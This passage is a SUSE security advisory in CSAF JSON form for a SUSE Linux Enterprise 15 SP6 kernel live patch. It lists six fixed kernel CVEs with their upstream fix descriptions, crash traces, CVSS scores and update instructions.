| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
34 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 18 for SUSE Linux Enterprise 15 SP6)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.81 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1100,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1100",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1100-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1100-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261100-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1100-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025012.html"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 18 for SUSE Linux Enterprise 15 SP6)",
"tracking": {
"current_release_date": "2026-03-26T23:08:12Z",
"generator": {
"date": "2026-03-26T23:08:12Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1100-1",
"initial_release_date": "2026-03-26T23:08:12Z",
"revision_history": [
{
"date": "2026-03-26T23:08:12Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
